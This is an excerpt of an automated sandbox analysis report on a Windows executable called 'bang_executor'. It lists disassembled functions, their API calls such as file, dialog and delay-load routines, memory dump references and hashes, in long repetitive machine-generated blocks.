                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 5f8bf4fd4ceca2fc98505cd64a360d2b14761e1cc2fda2b71cd051aa3005bcf5
                                        • Instruction ID: e1994f557800c40d6a352af2abaff6d0dbea1c166884e083f233136b84adeff8
                                        • Opcode Fuzzy Hash: 5f8bf4fd4ceca2fc98505cd64a360d2b14761e1cc2fda2b71cd051aa3005bcf5
                                        • Instruction Fuzzy Hash: 91A011A32A8002BCB0082280AC0AE3E0A0CFAC0B20B30EC2EF00AC00C2A88028800032
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005008E7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005008A7
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: ec351050bba59bc500ee844cf50cf040f01b87d5434132d51c407878ba7d9e24
                                        • Instruction ID: e1994f557800c40d6a352af2abaff6d0dbea1c166884e083f233136b84adeff8
                                        • Opcode Fuzzy Hash: ec351050bba59bc500ee844cf50cf040f01b87d5434132d51c407878ba7d9e24
                                        • Instruction Fuzzy Hash: 91A011A32A8002BCB0082280AC0AE3E0A0CFAC0B20B30EC2EF00AC00C2A88028800032
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050089A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005008A7
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 57ded4a6626cd4ea091dc42f7812e8aa6be2165e074ad8fbde0ee0132c90e11b
                                        • Instruction ID: 6a28e3aa580c613cee409a9d9f3ca5167269b8f816b7aa430ea5b9b8b541e7d0
                                        • Opcode Fuzzy Hash: 57ded4a6626cd4ea091dc42f7812e8aa6be2165e074ad8fbde0ee0132c90e11b
                                        • Instruction Fuzzy Hash: 74A012932541017C700821505C06D3E1A0CF9C0B10B30D83DF008C00C1544018800031
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005008B5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005008A7
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 74ba66f596d451b3e962c69b1792bbaf72a634e5fff6f5ff0d382650d23df7c9
                                        • Instruction ID: e1994f557800c40d6a352af2abaff6d0dbea1c166884e083f233136b84adeff8
                                        • Opcode Fuzzy Hash: 74ba66f596d451b3e962c69b1792bbaf72a634e5fff6f5ff0d382650d23df7c9
                                        • Instruction Fuzzy Hash: 91A011A32A8002BCB0082280AC0AE3E0A0CFAC0B20B30EC2EF00AC00C2A88028800032
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005008BF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005008A7
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 745bb728d4495cfad00bb242401ff7b2c10988b397b2ab61b517ae763338ee29
                                        • Instruction ID: e1994f557800c40d6a352af2abaff6d0dbea1c166884e083f233136b84adeff8
                                        • Opcode Fuzzy Hash: 745bb728d4495cfad00bb242401ff7b2c10988b397b2ab61b517ae763338ee29
                                        • Instruction Fuzzy Hash: 91A011A32A8002BCB0082280AC0AE3E0A0CFAC0B20B30EC2EF00AC00C2A88028800032
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00500A46 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005009FC
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 85fa5d7093f4face0b49fe68ae1a3d1f97c19e68c831f639a6bc5c796e90149b
                                        • Instruction ID: be2868fb19a1b1064d1f5f789511af6b4b0a0d853a1f614a73f257c65c12e5a9
                                        • Opcode Fuzzy Hash: 85fa5d7093f4face0b49fe68ae1a3d1f97c19e68c831f639a6bc5c796e90149b
                                        • Instruction Fuzzy Hash: 88A001D63AD502BCB5196295BD1BEBF0A1CF6C4B65B30AE2AF446C50C2A89128855232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00500A32 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005009FC
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: f82caa80424a896cbcedc75d9a061ffd3918eecd9fd0dda19058d44cebac9fc0
                                        • Instruction ID: be2868fb19a1b1064d1f5f789511af6b4b0a0d853a1f614a73f257c65c12e5a9
                                        • Opcode Fuzzy Hash: f82caa80424a896cbcedc75d9a061ffd3918eecd9fd0dda19058d44cebac9fc0
                                        • Instruction Fuzzy Hash: 88A001D63AD502BCB5196295BD1BEBF0A1CF6C4B65B30AE2AF446C50C2A89128855232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00500A3C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005009FC
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 887e6e959bb35dd392133d3ccbd609101cd505d37fa928064214210599d238d5
                                        • Instruction ID: be2868fb19a1b1064d1f5f789511af6b4b0a0d853a1f614a73f257c65c12e5a9
                                        • Opcode Fuzzy Hash: 887e6e959bb35dd392133d3ccbd609101cd505d37fa928064214210599d238d5
                                        • Instruction Fuzzy Hash: 88A001D63AD502BCB5196295BD1BEBF0A1CF6C4B65B30AE2AF446C50C2A89128855232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FCBB6 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetCurrentDirectoryW.KERNELBASE(?), ref: 004FCBBA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory
                                        • String ID:
                                        • API String ID: 1611563598-0
                                        • Opcode ID: 7ebf5543a3c58b38aad328a82c05585959d487fc843f44481c5a58606983a729
                                        • Instruction ID: 2ee0d08b1c3d32fca2a1a7feae99c0707bcc1ccd27e03816706eb9c8b4a6b736
                                        • Opcode Fuzzy Hash: 7ebf5543a3c58b38aad328a82c05585959d487fc843f44481c5a58606983a729
                                        • Instruction Fuzzy Hash: BDA01130200200AB82000B328F0AA8EBAAAAFA2A20F00C028A00280030CB328820FA00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 004FEA07 Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 453fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004FD5DD: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 004FD6C7
                                          • Part of subcall function 004FC5DD: GetCurrentDirectoryW.KERNEL32(?,?), ref: 004FC5E5
                                        • SetFileAttributesW.KERNEL32(?,00000000,?,?,?,00000800,?,08ADEBCE,?,00000000,00000001), ref: 004FEB53
                                        • _wcslen.LIBCMT ref: 004FEB8D
                                        • _wcslen.LIBCMT ref: 004FEBA1
                                        • _wcslen.LIBCMT ref: 004FEBC6
                                        • SHFileOperationW.SHELL32(?,?,?,?,00000800), ref: 004FEBFF
                                        • GetFileAttributesW.KERNEL32(?), ref: 004FEC0C
                                        • DeleteFileW.KERNEL32(?), ref: 004FEC1E
                                        • _swprintf.LIBCMT ref: 004FEC43
                                        • GetFileAttributesW.KERNEL32(?), ref: 004FEC52
                                        • MoveFileW.KERNEL32(?,?), ref: 004FEC6B
                                        • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 004FEC7F
                                        • _wcslen.LIBCMT ref: 004FECFA
                                        • _wcslen.LIBCMT ref: 004FED03
                                        • SetWindowTextW.USER32(?,?), ref: 004FED62
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: File$_wcslen$Attributes$Move$CurrentDeleteDirectoryEnvironmentExpandOperationStringsTextWindow_swprintf
                                        • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                        • API String ID: 1861470484-312220925
                                        • Opcode ID: 8ab2f10ad7b18b558199f6d700bb5352f5233c4e5b5be190f130e63fbb999e68
                                        • Instruction ID: 9aff890f3e5e242d30705dab9a4a3df1563fff915a9924fba02b6eabb0911157
                                        • Opcode Fuzzy Hash: 8ab2f10ad7b18b558199f6d700bb5352f5233c4e5b5be190f130e63fbb999e68
                                        • Instruction Fuzzy Hash: 30F1627290024DAADB31EFA1DC85AFF37BCBF49315F04042AFA05D6190EB789A498A55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004FE560 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 240windowfileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004E1366: GetDlgItem.USER32(00000000,00003021), ref: 004E13AA
                                          • Part of subcall function 004E1366: SetWindowTextW.USER32(00000000,005165F4), ref: 004E13C0
                                        • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 004FE602
                                        • EndDialog.USER32(?,00000006), ref: 004FE615
                                        • GetDlgItem.USER32(?,0000006C), ref: 004FE631
                                        • SetFocus.USER32(00000000), ref: 004FE638
                                        • SetDlgItemTextW.USER32(?,00000065,?), ref: 004FE66C
                                        • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 004FE69F
                                        • FindFirstFileW.KERNEL32(?,?), ref: 004FE6B5
                                          • Part of subcall function 004FCBC8: FileTimeToSystemTime.KERNEL32(?,?), ref: 004FCBEE
                                          • Part of subcall function 004FCBC8: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 004FCC05
                                          • Part of subcall function 004FCBC8: SystemTimeToFileTime.KERNEL32(?,?), ref: 004FCC19
                                          • Part of subcall function 004FCBC8: FileTimeToSystemTime.KERNEL32(?,?), ref: 004FCC2A
                                          • Part of subcall function 004FCBC8: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 004FCC42
                                          • Part of subcall function 004FCBC8: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,00000000,00000032), ref: 004FCC66
                                          • Part of subcall function 004FCBC8: _swprintf.LIBCMT ref: 004FCC85
                                        • _swprintf.LIBCMT ref: 004FE704
                                          • Part of subcall function 004E4C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004E4C13
                                        • SetDlgItemTextW.USER32(?,0000006A,?), ref: 004FE717
                                        • FindClose.KERNEL32(00000000), ref: 004FE71E
                                        • _swprintf.LIBCMT ref: 004FE773
                                        • SetDlgItemTextW.USER32(?,00000068,?), ref: 004FE786
                                        • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 004FE7A0
                                        • _swprintf.LIBCMT ref: 004FE7D9
                                        • SetDlgItemTextW.USER32(?,0000006B,?), ref: 004FE7EC
                                        • _swprintf.LIBCMT ref: 004FE83C
                                        • SetDlgItemTextW.USER32(?,00000069,?), ref: 004FE84F
                                          • Part of subcall function 004FD0AB: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 004FD0E1
                                          • Part of subcall function 004FD0AB: GetNumberFormatW.KERNEL32(00000400,00000000,?,0052272C,?,?), ref: 004FD12A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateDialogFirstFocusInfoLocalLocaleNumberSpecificWindow__vswprintf_c_l
                                        • String ID: %s %s$-P$REPLACEFILEDLG
                                        • API String ID: 3464475507-570988325
                                        • Opcode ID: 0a5ce3e1610327b6649dcc4f7e38724ab71a5bb74fcfd1b1fbd3148e686a72ff
                                        • Instruction ID: dabe14e7015255d0b98e565230c64ee05d33b697d9c9d8ac93d744a7328103b8
                                        • Opcode Fuzzy Hash: 0a5ce3e1610327b6649dcc4f7e38724ab71a5bb74fcfd1b1fbd3148e686a72ff
                                        • Instruction Fuzzy Hash: 4F71E47260834CBBE330ABA1DC4DFFF779CAB89705F00081AB749D2191D77999089A66
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004E7FD3 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 365fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 004E807F
                                        • _wcslen.LIBCMT ref: 004E8112
                                          • Part of subcall function 004E8C95: GetCurrentProcess.KERNEL32(00000020,?), ref: 004E8CB2
                                          • Part of subcall function 004E8C95: OpenProcessToken.ADVAPI32(00000000), ref: 004E8CB9
                                          • Part of subcall function 004E8C95: GetLastError.KERNEL32 ref: 004E8CF6
                                          • Part of subcall function 004E8C95: CloseHandle.KERNEL32(?), ref: 004E8D05
                                          • Part of subcall function 004EBC65: DeleteFileW.KERNELBASE(?,?,?,?,004EB14B,?,00000000,004EAF6E,08ADEBCE,00000000,0051517A,000000FF,?,004E8882,?,?), ref: 004EBC82
                                          • Part of subcall function 004EBC65: DeleteFileW.KERNEL32(?,?,?,00000800,?,004EB14B,?,00000000,004EAF6E,08ADEBCE,00000000,0051517A,000000FF,?,004E8882,?), ref: 004EBCAE
                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 004E81C1
                                        • CloseHandle.KERNEL32(00000000), ref: 004E81DD
                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000,?,?,?,?,?,?,?,08ADEBCE,00000000), ref: 004E8329
                                          • Part of subcall function 004EB7E2: FlushFileBuffers.KERNEL32(?), ref: 004EB7FC
                                          • Part of subcall function 004EB7E2: SetFileTime.KERNELBASE(?,?,?,?), ref: 004EB8B0
                                          • Part of subcall function 004EAFD0: FindCloseChangeNotification.KERNELBASE(?,?,?,004EAF75,08ADEBCE,00000000,0051517A,000000FF,?,004E8882,?,?), ref: 004EAFEB
                                          • Part of subcall function 004EC2E5: SetFileAttributesW.KERNELBASE(?,00000000,?,00000001,?,004EBF5E,?,?), ref: 004EC305
                                          • Part of subcall function 004EC2E5: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,004EBF5E,?,?), ref: 004EC334
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
